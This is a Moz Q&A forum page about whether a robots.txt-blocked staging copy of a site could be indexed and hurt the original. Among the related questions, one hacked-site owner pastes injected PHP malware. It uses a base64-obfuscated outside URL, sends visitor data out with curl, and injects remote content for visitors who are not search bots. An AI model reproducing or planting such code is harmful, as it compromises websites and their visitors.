Creating duplicate site for testing purpose. Can it hurt original site
-
Hello,
We are soon going to upgrade the cms to latest version along with new functionlaities - the process may take anywhere from 4 week to 6 weeks.
may suggest - we need to work on live server, what we have planned
-
take exact replica of site and move to a test domain, but on live server
-
Block Google, Bing, Yahoo - User-agent: Google Disallow: / , User-agent: Bing Disallow: / User-agent: Yahoo Disallow: / in robots.txt
-
Will upgrade CMS and add functionality - will test the entire structure, check url using screaming frog or xenu and move on to configure the site on original domain
The process upgradation and new tools may take 1 - 1.5 month....
Concern is that despite blocking Google, Bing & Yahoo through User agent disallow - can still the url can be crawled by the search engines - if yes - it may hurt the original site as will read on as entire duplicate or is there any alternate way around.. Many thanks
-
-
Thanks, am using it through Password Protected & meta noindex tag
Its been kept out of search engine crawl !!
-
Hey Gagan,
So I think you're question is will content on your staging site still get indexed despite using robots.txt? The answer is yes, sometimes that does happen especially if a lot of people link to it. The best way to keep content out of the index would be to use the meta robots tag with noindex, nofollow. Search engines are much better about adhering to those than robots.txt.
Let us know if you run into any problems!
-Mike
-
Hi Gagan,
Google are generally more than happy for sites to test new pages, layouts and functionality. They even have some free tools for that purpose.
Content Experiments
https://support.google.com/analytics/answer/1745147?ref_topic=1745207&rd=1
I'm not sure about the viability of of using Content Experiments to test a whole new site, but it would be worth looking into.
Let us know how you get on.
Neil.
-
Ahaa.. Thanks Mr. Robert for your views
However, does any kind of duplicate url can still occur - can google can still crawl the url despite been blocked through robots - can the original running site can suffer in any way, if we create duplicate site
Its a content based site - covering Auto reviews, updates with news, forum & blog updates. There is no ecommerce shopping or products involved
Our tentative time frame to add on features, test all changes and do major upgrade for latest version of cms will be approx 45 days. Do you feel any issue - if both original site and a duplicate one on test domain (despite blocked by robots), but on real time server goes on simultaneously for that period.
Also - you referred other way of testing changes - is it possible to share them ?
-
Gagan
I think this is a great and interesting question. First, you are adding functionality, etc. to a site and you are curious as to the effect of that on visitors to the site once they are on it. This is data anyone in SEO should want to see for their sites.
I would first say that you need to define the test period (assuming you already know what you want to measure) for the site. If it is a week for example, I do not think you need worry about whether a site with three major engines blocked will in some way run into duped content issues. (NOTE: If this is a large site and/or one with a critical revenue need - one that cannot afford to have any type of slight but temporary downturn - I would look for another way to test the changes. Even if I was sure there were no other issues.)
I am assuming that if an ecommerce site for example, there will be the ability for a shopper to purchase on both, etc.
I would not run the test for any long period of time for a site that creates leads, revenue, etc. as I think it could cause customer confusion which can be more critical than duped content.
Let us know how it works out,
Thanks
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
"Google chose different canonical than user" Issue Can Anyone help?
Our site https://www.travelyaari.com/ , some page are showing this error ("Google chose different canonical than user") on google webmasters. status message "Excluded from search results". Affected on our route page urls mainly. https://www.travelyaari.com/popular-routes-listing Our canonical tags are fine, rel alternate tags are fine. Can anyone help us regarding why it is happening?
White Hat / Black Hat SEO | | RobinJA0 -
Traffic going down in all sites in a niche
Hello, A client has three Ecommerce sites in a niche. Because of competition and a (possibly) non manual penalty due to doorways and paid links (though I think it's mainly competition too) our traffic is going down. What are the keys to increasing traffic at this point. Feel free to include tricks that cost money. A Hrefs (I love Moz though!) has some neat content tricks. Please give me the best tricks in the industry to increase traffic. We're adding content to the main site of the three and maybe that's what to focus on, but we're having trouble driving serious traffic with the content. We need serious traffic. We are experts in our field and capable of almost anything as far as information goes in our field. Thanks.
White Hat / Black Hat SEO | | BobGW0 -
Why would my domain authority drop 2 points ?and how can i bring my domain authority back up?'.
why would my domain authority drop 2 points ?and how can i bring my domain authority back up?'.
White Hat / Black Hat SEO | | aronwp0 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Can you have too many NOINDEX meta tags?
Hi, Our magento store has a lot of duplicate content issues - after trying various configurations with canonicals, robots, we decided it best and easier to manage to implement Meta NOINDEX tags to the pages that we wish the search engines to ignore. There are about 10000 URL's in our site that can be crawled - 6000 are Meta No Index - and 3000 odd are index follow. There is a high proportion of Meta No Index tags - can that harm our SEO efforts? thanks, Ben
White Hat / Black Hat SEO | | bjs20100 -
Should this site be punished?
Every summer for the past 4 years one of our customer's competitors suddenly has a big jump in Google's (.co.uk) rankings for some of the main industry phrases, particularly "air conditioning". We were always under the impression that they bought links before the busy summer season, as they have these strange massive jumps in the rankings. (for the rest of the year they often drop down) I recently checked out some of the back-links going to their site and noticed something I'd not seen before. Of the (approx) 480 links that showed up, around 80% of the SourceURL's ended with "?Action=Webring" (see 1st attached image). To me it doesn't look natural at all and I'm surprised that Google hasn't picked up on. Their site is www.aircon247.com. It had been mentioned to me that this may be to do with link sharing sites (which I assume is black-hat) but I'm not 100% sure that they are doing this. They also have an identical long spammy-looking footer at the bottom of every page which is clearly only for search engines to see. We reported it to Google a year ago but no action was taken. Do you think that it is acceptable to have it on every page? (see 2nd attached image) I would be interested to know your thoughts on both of these, and whether this would be a dangerous tactic to try and emulate? Gc5MU.png iXGA9.png
White Hat / Black Hat SEO | | trickshotric0 -
How can I make use of multiple domains to aid my SEO efforts?
About an year, the business I work for purchased 20+ domains: sendmoneyfromcanada.com sendmoneyfromaustralia.com sendmoneyfromtheuk.com sendmoneyfromireland.com The list goes on, but you can get the main idea. They thought that the domains can be useful to aid http://www.transfermate.com/ . I can set up a few micro sites on them, but from that point there will be no one to maintain them. And I'm, honestly, not too happy with hosting multiple sites on one IP and having them all link to the flagship. It is spammy and it does not bring any value to end users. I might be missing something, so my question is - Can I use these domains to boost my rankings, while avoiding any shady/spammy techniques? P.S. I had this Idea of auctioning the domains in order to cover for the domain registration fees.
White Hat / Black Hat SEO | | Svetoslav0